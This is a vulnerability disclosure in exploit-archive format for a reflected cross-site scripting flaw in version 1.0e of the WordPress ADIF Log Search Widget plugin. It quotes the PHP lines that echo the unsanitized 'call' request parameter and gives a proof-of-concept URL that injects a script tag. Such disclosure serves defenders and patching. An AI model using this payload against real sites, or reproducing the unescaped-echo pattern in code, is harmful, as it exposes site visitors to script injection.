# Exploit Title: ADIF Log Search Widget XSS Arbitrary Vulnerability
# Google Dork:
# Date: 26/05/13
# Exploit Author: k3170makan
# Vendor Homepage: http://wordpress.org/plugins/adif-log-search-widget/
# Software Link: http://wordpress.org/plugins/adif-log-search-widget/
# Version: 1.0e
# Tested on: Ubuntu 12.04.2 LTS
Wordpress ADIF log book search plugin widget suffers from a Cross Site
Scripting vulnerability.

Code: logbook_search.php
-------------------------------------------------------------------------------------------------------------------
 55  echo "
 56       <div id=\"logbook_poplight\" class=\"logbook_poplight\"
title=\"$num_rows QSO's with ".$_REQUEST['call']."\">";
 57  echo "<table>";
 58  echo " <tr>";


Code: logbook_search.php
-------------------------------------------------------------------------------------------------------------------
 93     else{
 94         echo "
 95
 96               <div id=\"logbook_poplight\" class=\"logbook_poplight\"
title=\"No QSO's with ".$_REQUEST['call']."\">
 97               Sorry, nothing found in the logbook!
 98               </div>
 99               ";
100               logbook_search_form();
101     }
102 }

The above code fails to sanitize the "$_REQUEST['call']" value passed to
the script from the Widgets HTML form, allowing attackers to inject
HTML/JavaScript into a victims browser session.


PoC:
http://[domain]/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E<http://127.0.0.1/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E>


-- 
<k3170makan
blog="http://blog.k3170makan.com"
src  ="https://github.com/k3170makan"
tweets="https://twitter.com/k3170makan"
/>